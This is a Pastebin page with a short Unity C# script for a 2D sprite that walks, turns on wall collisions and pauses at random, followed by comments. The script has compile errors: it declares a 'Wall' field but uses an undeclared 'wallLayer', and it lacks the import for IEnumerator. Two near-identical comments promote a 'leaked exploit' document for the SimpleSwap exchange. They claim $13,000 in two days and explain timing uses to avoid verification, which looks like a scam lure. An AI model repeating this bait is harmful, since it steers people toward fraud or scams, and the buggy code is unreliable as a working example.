Guest User

Untitled

a guest
Apr 26th, 2026
30
0
Never
3
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.49 KB | None | 0 0
  1. using UnityEngine;
  2.  
  3. public class Chibi : MonoBehaviour
  4. {
  5.  
  6. [SerializeField] private float speed = 2f;
  7.  
  8. [SerializeField]
  9. private LayerMask Wall;
  10.  
  11. private Rigidbody2D myRigidbody;
  12.  
  13. private bool isStopped = false;
  14.  
  15. private float[] stopTimes = new float[] { 1f, 3f, 6f, 9f };
  16.  
  17. private void Start()
  18. {
  19. myRigidbody = GetComponent<Rigidbody2D>();
  20. StartCoroutine(StopRoutine());
  21. }
  22.  
  23. private void Update()
  24. {
  25. if (!isStopped)
  26. {
  27. Move();
  28. }
  29. else
  30. {
  31. myRigidbody.linearVelocity = Vector2.zero;
  32. }
  33. }
  34.  
  35. private void Move()
  36. {
  37. myRigidbody.linearVelocity = new Vector2(transform.localScale.x * speed, myRigidbody.linearVelocity.y);
  38. }
  39.  
  40. private void OnCollisionEnter2D(Collision2D collision)
  41. {
  42. if (((1 << collision.gameObject.layer) & wallLayer) != 0)
  43. {
  44. TurnAround();
  45. }
  46. }
  47.  
  48. private void TurnAround()
  49. {
  50. Vector3 scale = transform.localScale;
  51. scale.x *= -1;
  52. transform.localScale = scale;
  53. }
  54.  
  55. private IEnumerator StopRoutine()
  56. {
  57. while (true)
  58. {
  59. yield return new WaitForSeconds(Random.Range(2f, 5f));
  60.  
  61. isStopped = true;
  62.  
  63. float stopTime = stopTimes[Random.Range(0, stopTimes.Length)];
  64.  
  65. yield return new WaitForSeconds(stopTime);
  66.  
  67. isStopped = false;
  68. }
  69. }
  70.  
  71. }
Advertisement
Comments
  • Torlilix
    28 days
    # CSS 0.84 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
  • Miraslix
    23 days
    # CSS 0.06 KB | 0 0
    1. You literally stole this exploit from https://t.me/theprotocolone
  • Melyuzor
    3 days
    # CSS 0.84 KB | 0 0
    1. ✅ Leaked Exploit Documentation:
    2.  
    3. https://docs.google.com/document/d/1ifNm-s74mX7GChaEzSJ1dVQCy1SrSxlMVRYi8ys0rgQ/edit?usp=sharing
    4.  
    5. This made me $13,000 in 2 days.
    6.  
    7. Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 25% — they will simply correct the exchange rate.
    8. The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.
    9.  
    10. Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without verification from SimpleSwap — instant swap).
Add Comment
Please, Sign In to add comment